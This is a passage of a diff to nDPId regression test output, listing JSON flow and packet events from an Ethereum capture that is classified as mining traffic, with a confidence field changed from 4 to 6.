{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHswoAAEAR05vAqAG4A9EtT3Zfdl8As46jAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHegkAAEARY2nAqAG4NOelbHZfdl8As+VvAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADH\/g8AAEAROunAqAG4EopsQ3Zfdl8As0D2AUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1578508364421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364421,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHWYMAAEARj8vAqAG4ImGsFnZfdl8As\/EZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1578508364422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcLWUAAEAR9WvAqAG4QipS9nZfdl8AiGZvYT14ALKwnMdgMCBzf19RhoDEZwfAnRP1Mz5t1CQfWH9BMW+RtakCpISLcdct0MfsiOdcBIDUccBBbd+y\/K0wDya+KeRA13HRMdUz2NPxyyUESIw4\/BeiGYIdI8USz9rYAAHdBMuEfwAAAYJ2X4J2X8mEQipS9oJ2X4CEXhYgYAU="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rFMqjeViKJkeSDvzXh7sPhNhChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN1yRfRd+2g8MnNCa1j1Cnr1GFpxy7vxkYduQKQx1cGeo9xW0LFVTR4sISMRFqTJvP1+kBDeZDQ7++taiTPWLVf4TYSfy1QfgnZfgnZfuEATr9aMDwnYcu1Ru9AfCYxf1j4pIYv3iEkEPcprByn6GaZXC692Pg7aNtJE7Ibn2jkRlWjrNM1fsvjqm9oBENLzhF4WIGA="} 01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1578508364519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFF1VAAC8RP1MD0S1PwKgBuHZfdl8BsTR2htDCYwB7bPwVHRrppzCkGewLkUUNlB3jVcwKSsPl3PpRPPiYpogGSbVhGO6LOf+6vpmiVjQKuGK9fr9HzQor5V9uX7UyvZMEj8wMYsgT45Bz2Z7bdsQaazyQJOYgw3sXAAT5AUT5ATz4TYSi5B2ggnZfgnZfuEAwVdpN68jOobX+wHrrL2RH\/wK1ka2szeSJGHiHFFoNLEPxKwxFy33NRZ3ovPOnkwdh3qJaARUyaYeXnrMHfiPL+E2EpERrUoJ2YYJ2YbhAbVK4hBOIFxjMK61hoo+B2E1DFAGWystZDApZ1qWqMdGzPO6EtDCqKOy2kznyTf9sEf\/6IzNe3mDxF09nkCXqPPhNhCPpxYOCdl+Cdl+4QEyRwYHw012pKtGG4pX25QXUlp9AiY+SLu1l7sUn3fRNHZfvnNA3az+glcVdf8irWyfLyfxkF3pVP8czohGx7uH4TYTR+vDNgnZfgnZfuEDT1Pf73xy4M3qZSRLleOgEdgguFkAavHpg2I9RZUlU1ZSe7W107ts9v4ZrZs61PWJz3Pgt4YI56NsUnL8RZ7gNhF4WIGA="} @@ -65,112 +65,112 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 